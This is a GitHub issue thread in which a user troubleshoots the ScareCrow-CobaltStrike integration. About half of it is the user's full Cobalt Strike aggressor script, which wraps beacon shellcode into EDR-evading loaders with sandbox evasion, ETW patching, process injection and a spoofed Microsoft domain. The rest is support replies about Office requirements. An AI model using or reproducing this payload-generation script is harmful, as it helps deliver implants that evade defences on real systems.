Closed tgelliott196 closed 2 years ago
Hey, try not to change the name when saving the beacon and let me know if that works with you
Hey, try not to change the name when saving the beacon, and let me know if that works with you
I'm not changing the name. I click listener, leave stageless, (choices to pick from binary,control,dll,excel,msiexec,or wscript) choice to output for x86exe or x64exe not an option. Then I leave the default domain of www.microsoft.com and click generate. It asks me for a loader name. I leave it blank because not sure what to do here and I click generate. No matter the file type I pick minus .dll it makes a beacon called scbeacon.bin. I thought it was supposed to generate code an exe, create an excel doc, an msi, wscript script, or excel macro. Not sure where to go from scbeacon.bin what to do with it. Or am I missing part of the install or something else?
Did you follow the installation guide? and the extra packages needed to do that? Also the configuration? Share me your cna script. Also are you doing the excel loader from linux?
Did you follow the installation guide? and the extra packages needed to do that? Also the configuration? Share me your cna script. Also are you doing the excel loader from linux?
I did a git clone and followed the readme to install.sh and changed the config paths. Since it was an install.sh I installed on linux. Yes, I'm trying to do excel loader from linux because that is where i have cs installed and Scarecrow-cs.
############################################################
############################################################
$script_path = "/opt/scarecrows/ScareCrow-CobaltStrike";
$scarecrow_executable = "/opt/scarecrows/ScareCrow-CobaltStrike/ScareCrow";
$cs_directory = "/opt/cobaltstrike";
$python3 = "/usr/bin/python3"; ############################################################
$loader = ""; $domain = ""; $etw = ""; $sandbox = ""; $custom_bin = ""; $loader_name = ""; $shellcode = ""; $injection = "";
menubar("ScareCrow", "scare_crow");
popup scare_crow { item "&Generate Payload" { ScareCrow(); } }
sub ScareCrow { local('$dialog %defaults'); %defaults["domain"] = "www.microsoft.com";
$dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &mainCallback);
dialog_description($dialog, "Generate EDR evasion payloads. (#) for optional, (*) for required options.");
drow_listener_stage($dialog, "listener", "(*) Listener: ");
drow_file($dialog, "custom_binary", "(#) Custom x64 Shellcode: ");
drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless"));
drow_combobox($dialog, "architecture", "(*) Architecture: ", @("x64"));
drow_combobox($dialog, "loader", "(*) Loader: ", @("binary", "control", "dll", "excel", "msiexec", "wscript"));
drow_checkbox($dialog, "etw", "(#) Disable ETW patching (enabled by default)");
drow_checkbox($dialog, "sandbox", "(#) Sandbox evasion");
drow_text($dialog, "injection", "(#) Process Injection: ");
drow_text($dialog, "domain", "(*) Domain: ");
dbutton_action($dialog, "Generate Payload");
dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
dialog_show($dialog);
}
sub loaderDialog { local('$dialog %defaults');
$dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &loaderDialogCallback);
dialog_description($dialog, "Specify JScript loader name for the payload e.g. Loader.js - (**Optional For Control payloads)");
drow_text($dialog, "loader_name", "Loader name: ");
dbutton_action($dialog, "Generate");
dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
dialog_show($dialog);
}
sub loaderDialogCallback { $loader_name = $3["loader_name"]; GeneratePayload(); }
sub mainCallback { if ($3["listener"] eq "") { show_message("No listener specified!"); exit(); }
$loader = $3["loader"];
$domain = $3["domain"];
$etw = $3["etw"];
$sandbox = $3["sandbox"];
$custom_bin = $3["custom_binary"];
$injection = $3["injection"];
if ($injection ne "" && $etw eq "false"){
show_message("Cannot use Process Injection and ETW patching together. Disable ETW patching if you want to do a Process Injection");
exit();
}
if ($custom_bin ne ""){
$shellcode_file = openf($custom_bin);
$shellcode = readb($shellcode_file, -1);
closef($shellcode_file);
}else{
$shellcode = artifact_payload($3["listener"], "raw", $3["architecture"]);
}
if ($loader eq "binary"){
GeneratePayload();
} else if ($loader eq "dll"){
GeneratePayload();
}else if ($loader eq "control"){
loaderDialog();
}else if ($loader eq "excel"){
loaderDialog();
}else if ($loader eq "msiexec"){
loaderDialog();
}else if ($loader eq "wscript"){
loaderDialog();
}
}
sub GeneratePayload { prompt_file_save("scbeacon.bin", { show_message("Generating payload, please wait... You can close this dialog while you wait.");
$handle = openf(">" . $1);
writeb($handle, $shellcode);
closef($handle);
$data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory . " " . $etw . " " . $sandbox . " " . $injection . " " . $loader_name);
$pythondata = readAll($data);
show_message("Executable saved to: " . $pythondata);
});
}
println("\n\c9[+]\o Loaded ScareCrow.cna!"); println("\c8[!]\o \$script_path set to '\U$script_path\U'"); println("\c8[!]\o \$scarecrow_executable set to '\U$scarecrow_executable\U'"); println("\c8[!]\o \$cs_directory set to '\U$cs_directory\U'");
It needs Excel on your system to work.
I guess i was confused because the install file is install.sh So, for this to work Cobaltstrike, BASH, and MS office need to be installed on windows? Or will it work with LibreOffice?
Ms Office. Read your tools
unfortunately, work only gave me the Cobalstrike install for Linux and Office is only compatible with win,mac,android.
On Tue, Feb 8, 2022 at 11:05 AM UserX @.***> wrote:
Ms Office. Read your tools
— Reply to this email directly, view it on GitHub https://github.com/GeorgePatsias/ScareCrow-CobaltStrike/issues/6#issuecomment-1032779881, or unsubscribe https://github.com/notifications/unsubscribe-auth/ALSQ2YGRIHDQ72RDVTY2LDLU2E5NPANCNFSM5NSJTTKQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
You are receiving this because you authored the thread.Message ID: @.***>
so every payload is a .bin for me except the dll that doesnt work for me.
dont know what i'm doing wrong. installed on kali, changed paths, loaded cna, dont know what else to do
screenshots.docx